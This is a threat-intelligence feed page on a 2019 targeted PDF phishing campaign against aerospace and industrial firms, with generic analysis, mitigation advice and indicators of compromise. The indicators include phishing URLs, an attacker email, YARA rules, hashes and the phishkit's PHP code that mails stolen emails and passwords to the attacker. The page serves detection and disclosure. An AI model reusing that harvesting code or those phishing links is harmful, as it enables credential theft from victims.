Skip to main content
Threat Radar animated logo
DashboardThreatsMapFeedsAPILifetime Access
reconnecting
Press slash or control plus K to focus the search. Use the arrow keys to navigate results and press enter to open a threat.
Reconnecting to live updates…

Targeted phishing - PDF documents / phishkit

0
Low
Phishingmisp-galaxy:mitre-attack-pattern="spearphishing attachment - t1193"misp-galaxy:mitre-attack-pattern="spearphishing link - t1192"enisa:nefarious-activity-abuse="spear-phishing-attacks"type:osintosint:lifetime="perpetual"osint:certainty="50"tlp:whitetlp:cleartlp:green
Published: Thu May 16 2019 (05/16/2019, 00:00:00 UTC)
Source: CIRCL OSINT Feed
Vendor/Project: type
Product: osint

Description

Targeted phishing - PDF documents / phishkit

AI-Powered Analysis

AILast updated: 12/06/2025, 04:35:11 UTC

Technical Analysis

The threat described is a targeted phishing campaign utilizing PDF documents as the primary vector for attack delivery. These PDFs may contain malicious payloads or links to phishing sites, often deployed through phishkits—pre-packaged tools that simplify the creation and distribution of phishing content. The attack patterns align with MITRE ATT&CK techniques T1193 (Spearphishing Attachment) and T1192 (Spearphishing Link), indicating that the adversaries craft emails with malicious PDFs either attached or linked, aiming to deceive recipients into opening them. Once opened, these PDFs can exploit vulnerabilities in PDF readers or prompt users to enter credentials on fake login pages, leading to credential theft or malware installation. The campaign is characterized by its targeted nature, focusing on specific individuals or organizations, which increases the likelihood of success compared to generic phishing. The threat is persistent and ongoing, as indicated by the 'perpetual' lifetime tag, but currently, there are no known exploits in the wild or patches available, suggesting that the threat relies heavily on social engineering rather than technical vulnerabilities. The low severity rating reflects the current impact assessment but does not diminish the potential risks if the phishing attempts succeed. Indicators of compromise are not provided, which may complicate detection efforts. The threat is sourced from CIRCL OSINT feeds, emphasizing open-source intelligence gathering on phishing activities.

Potential Impact

For European organizations, the impact of this threat primarily involves the risk of credential compromise, unauthorized access, and potential malware infections. Successful spearphishing can lead to data breaches, financial fraud, and disruption of business operations. Organizations in sectors such as finance, government, healthcare, and critical infrastructure are particularly at risk due to the high value of their data and systems. The use of PDF documents as a delivery mechanism exploits common user behaviors and trusted document formats, increasing the likelihood of user interaction and successful exploitation. Even though the current severity is low, the ease of exploitation and targeted nature mean that a successful attack could have medium to high consequences, including reputational damage and regulatory penalties under GDPR if personal data is exposed. The lack of patches or technical exploits means that traditional vulnerability management is less effective, placing greater emphasis on user vigilance and detection capabilities.

Mitigation Recommendations

To mitigate this threat, European organizations should implement a multi-layered defense strategy: 1) Conduct targeted user awareness and phishing simulation training focused on recognizing malicious PDFs and suspicious links, emphasizing the risks of spearphishing. 2) Deploy advanced email filtering solutions capable of scanning and sandboxing PDF attachments and embedded links to detect malicious content before delivery. 3) Utilize endpoint protection platforms with behavioral analysis to detect and block exploitation attempts from malicious PDFs. 4) Enforce strict access controls and multi-factor authentication to reduce the impact of credential theft. 5) Monitor network traffic for unusual activity indicative of phishing or post-compromise actions. 6) Establish incident response procedures specifically for phishing incidents, including rapid containment and credential resets. 7) Encourage reporting of suspicious emails to security teams to improve threat intelligence and response. 8) Regularly update and patch PDF reader software to minimize exploitation of known vulnerabilities, even though no specific patches are currently available for this threat. 9) Leverage threat intelligence feeds to stay informed about emerging phishing tactics and indicators.

Affected Countries

United KingdomUnited Kingdom
GermanyGermany
FranceFrance
NetherlandsNetherlands
ItalyItaly
SpainSpain
BelgiumBelgium
SwedenSweden
PolandPoland
Need more detailed analysis?Get Pro

Technical Details

Uuid
5cdd3938-7134-4908-9552-173cc0a8016e
Original Timestamp
1764973857

Indicators of Compromise

Yara

ValueDescriptionCopy
yararule PDF_LIFT { strings: $a = "Rect[ 195.05 428.59 411.79 489.67]" condition: all of them }
yararule PDF_JAT_AUTHOR { strings: $a = "<</Author(JAT)" condition: all of them }
Generic yara rule to find the common JAT author.

Email

ValueDescriptionCopy
emailjatboss6@gmail.com
Email used to send credentials (found in the sendmail.php file)

Url

ValueDescriptionCopy
urlhttps://lulufabllc.com/doc/cdnrg.com/index.php
Phishing links
urlhttps://helpersserer.com/wp-inc/Response/www.tenova.com/index.php
Phishing links
urlhttps://www.arbutusroutes.com/document/standardaero.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/utc.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/gd.com/
Phishing links
urlhttps://www.arbutusroutes.com/document/airbus.com/
Phishing links
urlhttp://office.online-drive.ml/push-doc/cproduct_brochure_fg.php
Older phishing link where the login page was mirror in Wed, 12 Sep 2018 06:29:39 GMT
urlhttps://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php
Phishing links
urlhttps://arbutusroutes.com/ssl/akhurst.com/index.php
Phishing links

Target org

ValueDescriptionCopy
target-orgairbus.com
target-orgtenova.com
target-orgstandardaero.com
target-orggd.com
target-orgutc.com
target-orgcdnrg.com
target-orgakhurst.com

File

ValueDescriptionCopy
file28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
file56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
fileddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
file0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
filec052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
filef2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
fileNew-Updated-docs.zip
filesendmail.php

Size in-bytes

ValueDescriptionCopy
size-in-bytes293456
size-in-bytes283714
size-in-bytes252891
size-in-bytes447466
size-in-bytes156088
size-in-bytes485888
size-in-bytes3525231

Float

ValueDescriptionCopy
float7.9916395623958
float7.9880939695683
float7.9916147992407
float7.991595563552
float7.9280918012902
float7.9068746522467

Hash

ValueDescriptionCopy
hash9a58b7f8ba04c32c027126379456e444
hashb49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214
hash28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
hash1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f
hash164db8d1fe5f2ea9dd3ea826b2f0b808
hash890efaa698f4d43aad15c3dbacb6c01544fd3e27
hash56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
hash27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3
hash08b49fb9882bfc8f69beb594fa543c8a
hash201e85d6bc519ecc6dece75b2586e761a56db6a7
hashddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
hashb4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8
hash1baa024f9cfab48b92c297aa406c91b5
hash7d5a1dc90d535e3cc552d0db02841d28fb1ae773
hash0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
hash4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416
hashda877f4f7335264b03ac72fca5b305dc
hash435aa871cdd772072390d9baceaa8d832208d710
hashc052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
hash6ff7cb6507259bc322a8d400c34060d17e33483dab5b035d519447b2756a49da236acc54a413227168d7926ce758dfb169c8d92d58d2cc9b0c81cb6de383a1fd
hashb830fd2997e1f124f34d77ff1fa9b89e
hashea43350c37e0c266c12d0fd53643cf94dd58c1f7
hashf2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
hash24a7f8c2e5d774554c69113b4b81a9755113db1ac620e0d9f0339919a0982e7c169446cb0fe4f3a9232f757a9ccd82676f55207cc044033e3485d1f22d965de1
hashb7245bf657e792328aaacbc6f75d1555
hashbc32ff3213011db8278bfcd21b1dc432ded499d3
hash9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58

Malware sample

ValueDescriptionCopy
malware-sample28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02|9a58b7f8ba04c32c027126379456e444
malware-sample56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936|164db8d1fe5f2ea9dd3ea826b2f0b808
malware-sampleddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73|08b49fb9882bfc8f69beb594fa543c8a
malware-sample0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132|1baa024f9cfab48b92c297aa406c91b5
malware-samplec052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2|da877f4f7335264b03ac72fca5b305dc
malware-samplef2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a|b830fd2997e1f124f34d77ff1fa9b89e
malware-sampleNew-Updated-docs.zip|b7245bf657e792328aaacbc6f75d1555

Mime type

ValueDescriptionCopy
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.5
mime-typePDF document, version 1.7
mime-typeCDFV2 Microsoft Outlook Message

Ssdeep

ValueDescriptionCopy
ssdeep6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ
ssdeep6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/
ssdeep6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1
ssdeep12288:Jn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3FM:Jn4iQUwQDkp6hdVM
ssdeep3072:zr3i3ArGdqMW/5DsvvqTfAL3LKhMbgfGSL2YxPfmXfj:H3i3ASXQgvSA/K7XiYxG7
ssdeep12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV

Text

ValueDescriptionCopy
textAdobe-Standard-Encoding
textMalicious
textSuspect
textJATBOSS
text<?php if(isset($_SERVER['HTTP_X_REAL_IP'])){ $ip = $_SERVER['HTTP_X_REAL_IP']; }else{ $ip=$_SERVER['REMOTE_ADDR']; } $message .= "|----------| E M A I L |--------------|\n"; $message .= "Online: ".$_POST['email']."\n"; $message .= "pass: ".$_POST['pwd']."\n"; $message .= "|--------------- I N F O | I P -------------------|\n"; $message .= "|Client IP: ".$ip."\n"; $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n"; $message .= "User Agent : ".$useragent."\n"; $message .= "|----------- HACKED BY JATBOSS --------------|\n"; $send = "jatboss6@gmail.com"; $subject = "$country | $ip"; { mail("$send", "$subject", $message); } ?>
textPHP
textMalicious
text1/56
text0/58
text2/59
text1/54
text10/61
text1/60
text0/58

Gender

ValueDescriptionCopy
genderPrefer not to say

Datetime

ValueDescriptionCopy
datetime2019-05-16T08:54:33
datetime2019-05-13T02:37:30
datetime2019-05-13T02:37:43
datetime2019-05-15T17:45:13
datetime2019-05-16T09:42:04
datetime2019-05-15T20:41:35
datetime2019-05-13T02:37:29

Link

ValueDescriptionCopy
linkhttps://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/
linkhttps://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/
linkhttps://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/
linkhttps://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/
linkhttps://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/
linkhttps://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/
linkhttps://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/

Threat ID: 6933b2702271496a0fa16ea3

Added to database: 12/6/2025, 4:34:56 AM

Last enriched: 12/6/2025, 4:35:11 AM

Last updated: 12/8/2025, 2:15:59 AM

Views: 16

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by
Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Related Threats

ThreatFox IOCs for 2025-12-07

Medium
MalwareMon Dec 08 2025

ThreatFox IOCs for 2025-12-06

Medium
MalwareSun Dec 07 2025

ThreatFox IOCs for 2025-12-05

Medium
MalwareSat Dec 06 2025

ThreatFox IOCs for 2025-12-04

Medium
MalwareFri Dec 05 2025

ThreatFox IOCs for 2025-12-03

Medium
MalwareThu Dec 04 2025

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

External Links

Search on Google

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats